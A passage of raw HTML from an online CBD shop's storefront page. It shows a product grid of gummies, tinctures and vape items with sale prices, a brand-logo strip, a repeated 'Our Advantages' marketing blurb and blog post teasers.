class="woocs_price_code" data-currency="" data-redraw-id="641ce3026a1a7" data-product-id="1151"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/300mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles5-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1148" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1148" data-product_sku="CBD personal care-1-1" aria-label="Add “CBD gummies Jar/ 30pieces 300mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/300mgcbd/">CBD gummies Jar/ 30pieces 300mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026a72f" data-product-id="1148"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles4-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=1142" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="1142" data-product_sku="CBD personal care-1" aria-label="Add “CBD gummies bags/6 pieces 200mgCBD” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cbd-gummies-bags-6-pieces-200mgcbd/">CBD gummies bags/6 pieces 200mgCBD</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026ace5" data-product-id="1142"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles1-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=34" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="34" data-product_sku="Woo-beanie-logo" aria-label="Add “Oil tincture 30ml or 60 ml size bottle” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/oil-tincture-30ml-or-60-ml-size-bottle/">Oil tincture 30ml or 60 ml size bottle</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026b27e" data-product-id="34"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 20.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cbd-personal-care/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Edibles3-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=26" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="26" data-product_sku="CBD personal care" aria-label="Add “lube 1000mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cbd-personal-care/">lube 1000mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026b7e9" data-product-id="26"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 3.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 2.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/hoodie-with-pocket/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-324x324.png 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape3-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=21" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="21" data-product_sku="woo-hoodie-with-pocket" aria-label="Add “CBD 100mg or 300mg” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/hoodie-with-pocket/">CBD 100mg or 300mg</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026bd8a" data-product-id="21"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 45.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 35.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/cap/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Vape1-324x324.png" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Vape1-324x324.png 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Vape1-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=19" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="19" data-product_sku="woo-cap" aria-label="Add “Cartridges and juice refill vape batteries vape pens” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/cap/">Cartridges and juice refill vape batteries vape pens</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026c609" data-product-id="19"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 18.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 16.00</bdi></span></ins></span></span> </div> </div> </div> </div> <div class="ht-col-lg-3 ht-col-md-6 ht-col-sm-6 ht-col-xs-12 mb-50"> <div class="product-item "> <div class="product-inner"> <div class="image-wrap"> <a href="https://shopopenmarket.com/product/belt/" class="image"> <span class="onsale">Sale!</span> <img width="300" height="300" src="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" decoding="async" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-324x324.jpg 324w, https://shopopenmarket.com/wp-content/uploads/CBD-Drinks-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /> </a> <div class="actions "> <a href="?add-to-cart=18" data-quantity="1" class="button wp-element-button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="18" data-product_sku="woo-belt" aria-label="Add “H2O--Savagecbd - pink lemonade drink mix” to your cart" rel="nofollow">Add to cart</a> </div> </div> <div class="content"> <h4 class="title"><a href="https://shopopenmarket.com/product/belt/">H2O–Savagecbd – pink lemonade drink mix</a></h4> <span class="price"><span class="woocs_price_code" data-currency="" data-redraw-id="641ce3026cb74" data-product-id="18"><del aria-hidden="true"><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 65.00</bdi></span></del> <ins><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 55.00</bdi></span></ins></span></span> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-9d2ba64 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="9d2ba64" data-element_type="section" data-settings="{"stretch_section":"section-stretched"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6690e87" data-id="6690e87" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-d19edee elementor-widget elementor-widget-heading" data-id="d19edee" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Shop by Brand</h2> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-49a7d67 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="49a7d67" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-4e8a643" data-id="4e8a643" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-149eabe elementor-widget elementor-widget-image" data-id="149eabe" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand1.gif" class="attachment-large size-large wp-image-283" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand1.gif 150w, https://shopopenmarket.com/wp-content/uploads/brand1-100x100.gif 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-d24627c" data-id="d24627c" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-24e48a1 elementor-widget elementor-widget-image" data-id="24e48a1" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand2.jpg" class="attachment-large size-large wp-image-284" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand2.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand2-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-79a1910" data-id="79a1910" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-3508877 elementor-widget elementor-widget-image" data-id="3508877" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand3.jpg" class="attachment-large size-large wp-image-282" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand3.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand3-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-0c00542" data-id="0c00542" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-32c9fdd elementor-widget elementor-widget-image" data-id="32c9fdd" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand4.jpg" class="attachment-large size-large wp-image-288" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand4.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand4-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-51ebdaf elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="51ebdaf" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-59899bd" data-id="59899bd" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-849da46 elementor-widget elementor-widget-image" data-id="849da46" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand5.jpg" class="attachment-large size-large wp-image-281" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand5.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand5-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-57ae660" data-id="57ae660" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-03350ba elementor-widget elementor-widget-image" data-id="03350ba" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand6.png" class="attachment-large size-large wp-image-285" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand6.png 150w, https://shopopenmarket.com/wp-content/uploads/brand6-100x100.png 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-ac3d912" data-id="ac3d912" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-79148c4 elementor-widget elementor-widget-image" data-id="79148c4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand7.jpg" class="attachment-large size-large wp-image-287" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand7.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand7-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-271a50b" data-id="271a50b" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-9983228 elementor-widget elementor-widget-image" data-id="9983228" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/brand8.jpg" class="attachment-large size-large wp-image-286" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/brand8.jpg 150w, https://shopopenmarket.com/wp-content/uploads/brand8-100x100.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-18f4d93 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="18f4d93" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-66a5bc4" data-id="66a5bc4" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-d8235ae elementor-widget elementor-widget-heading" data-id="d8235ae" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Our Advantages:</h2> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-be17169 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="be17169" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-79af2b5" data-id="79af2b5" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-cafcdaa elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-image-box" data-id="cafcdaa" data-element_type="widget" data-widget_type="image-box.default"> <div class="elementor-widget-container"> <div class="elementor-image-box-wrapper"><figure class="elementor-image-box-img"><img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/ad1.png" class="attachment-full size-full wp-image-267" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/ad1.png 150w, https://shopopenmarket.com/wp-content/uploads/ad1-100x100.png 100w" sizes="(max-width: 150px) 100vw, 150px" /></figure><div class="elementor-image-box-content"><h3 class="elementor-image-box-title">NO PRESCRIPTION REQUIRED</h3><p class="elementor-image-box-description">Prescription only helps in determining dosage, to purchase our products you do not require it, our products are safe, and non- psychoactive!</p></div></div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-753d1ec" data-id="753d1ec" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-7c6904b elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-image-box" data-id="7c6904b" data-element_type="widget" data-widget_type="image-box.default"> <div class="elementor-widget-container"> <div class="elementor-image-box-wrapper"><figure class="elementor-image-box-img"><img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/ad2.png" class="attachment-full size-full wp-image-273" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/ad2.png 150w, https://shopopenmarket.com/wp-content/uploads/ad2-100x100.png 100w" sizes="(max-width: 150px) 100vw, 150px" /></figure><div class="elementor-image-box-content"><h3 class="elementor-image-box-title">EFFICIENT & DISCREET SHIPPING</h3><p class="elementor-image-box-description">Prescription only helps in determining dosage, to purchase our products you do not require it, our products are safe, and non- psychoactive!</p></div></div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-6d92781" data-id="6d92781" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-5bb6530 elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-image-box" data-id="5bb6530" data-element_type="widget" data-widget_type="image-box.default"> <div class="elementor-widget-container"> <div class="elementor-image-box-wrapper"><figure class="elementor-image-box-img"><img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/ad3.png" class="attachment-full size-full wp-image-274" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/ad3.png 150w, https://shopopenmarket.com/wp-content/uploads/ad3-100x100.png 100w" sizes="(max-width: 150px) 100vw, 150px" /></figure><div class="elementor-image-box-content"><h3 class="elementor-image-box-title">SECURE & ENCRYPTED PAYMENT</h3><p class="elementor-image-box-description">Prescription only helps in determining dosage, to purchase our products you do not require it, our products are safe, and non- psychoactive!</p></div></div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-fabacfa" data-id="fabacfa" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-cb58929 elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-image-box" data-id="cb58929" data-element_type="widget" data-widget_type="image-box.default"> <div class="elementor-widget-container"> <div class="elementor-image-box-wrapper"><figure class="elementor-image-box-img"><img decoding="async" width="150" height="150" src="https://shopopenmarket.com/wp-content/uploads/ad4.png" class="attachment-full size-full wp-image-275" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/ad4.png 150w, https://shopopenmarket.com/wp-content/uploads/ad4-100x100.png 100w" sizes="(max-width: 150px) 100vw, 150px" /></figure><div class="elementor-image-box-content"><h3 class="elementor-image-box-title">HIGHEST GRADE CBD</h3><p class="elementor-image-box-description">Prescription only helps in determining dosage, to purchase our products you do not require it, our products are safe, and non- psychoactive!</p></div></div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-cc55f2b elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cc55f2b" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e7afea9" data-id="e7afea9" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-accfa42 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="accfa42" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e64c454" data-id="e64c454" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-e2db9f0 elementor-widget elementor-widget-heading" data-id="e2db9f0" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">From the Blog</h2> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-af5f1c3 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="af5f1c3" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-eb91c84" data-id="eb91c84" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-9781425 elementor-widget elementor-widget-elementskit-blog-posts" data-id="9781425" data-element_type="widget" data-widget_type="elementskit-blog-posts.default"> <div class="elementor-widget-container"> <div class="ekit-wid-con" > <div id="post-items--9781425" class="row post-items"> <div class="col-lg-4 col-md-6"> <div class="elementskit-post-image-card"> <div class="elementskit-entry-header"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-3/" class="elementskit-entry-thumb"> <img decoding="async" src="https://shopopenmarket.com/wp-content/uploads/blog1.jpg" alt="What is the Difference between Hemp CBD Oil and Marijuana CBD Oil?"> </a><!-- .elementskit-entry-thumb END --> </div><!-- .elementskit-entry-header END --> <div class="elementskit-post-body "> <h2 class="entry-title"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-3/"> What is the Difference between Hemp CBD Oil and Marijuana CBD Oil? </a> </h2> <p>Here, we’d like to explain the difference between cannabis (or marijuana) and hemp (or industrial hemp). are two different varieties of Cannabis sativa plant that…</p> <div class="btn-wraper"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-3/" class="elementskit-btn whitespace--normal" > Learn more </a> </div> </div><!-- .elementskit-post-body END --> </div> </div> <div class="col-lg-4 col-md-6"> <div class="elementskit-post-image-card"> <div class="elementskit-entry-header"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-2/" class="elementskit-entry-thumb"> <img decoding="async" src="https://shopopenmarket.com/wp-content/uploads/blog1.jpg" alt="What is the Difference between Hemp CBD Oil and Marijuana CBD Oil?"> </a><!-- .elementskit-entry-thumb END --> </div><!-- .elementskit-entry-header END --> <div class="elementskit-post-body "> <h2 class="entry-title"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-2/"> What is the Difference between Hemp CBD Oil and Marijuana CBD Oil? </a> </h2> <p>Here, we’d like to explain the difference between cannabis (or marijuana) and hemp (or industrial hemp). are two different varieties of Cannabis sativa plant that…</p> <div class="btn-wraper"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil-2/" class="elementskit-btn whitespace--normal" > Learn more </a> </div> </div><!-- .elementskit-post-body END --> </div> </div> <div class="col-lg-4 col-md-6"> <div class="elementskit-post-image-card"> <div class="elementskit-entry-header"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil/" class="elementskit-entry-thumb"> <img decoding="async" src="https://shopopenmarket.com/wp-content/uploads/blog1.jpg" alt="What is the Difference between Hemp CBD Oil and Marijuana CBD Oil?"> </a><!-- .elementskit-entry-thumb END --> </div><!-- .elementskit-entry-header END --> <div class="elementskit-post-body "> <h2 class="entry-title"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil/"> What is the Difference between Hemp CBD Oil and Marijuana CBD Oil? </a> </h2> <p>Here, we’d like to explain the difference between cannabis (or marijuana) and hemp (or industrial hemp). are two different varieties of Cannabis sativa plant that…</p> <div class="btn-wraper"> <a href="https://shopopenmarket.com/what-is-the-difference-between-hemp-cbd-oil-and-marijuana-cbd-oil/" class="elementskit-btn whitespace--normal" > Learn more </a> </div> </div><!-- .elementskit-post-body END --> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-14b2f7b elementor-section-stretched elementor-section-full_width elementor-section-height-default elementor-section-height-default" data-id="14b2f7b" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b921ad1" data-id="b921ad1" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-86554ca elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="86554ca" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e4aa020" data-id="e4aa020" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-53bcbf8 elementor-view-default elementor-widget elementor-widget-icon" data-id="53bcbf8" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <div class="elementor-icon"> <i aria-hidden="true" class="fab fa-instagram"></i> </div> </div> </div> </div> <div class="elementor-element elementor-element-ad28629 elementor-widget elementor-widget-heading" data-id="ad28629" data-element_type="widget" 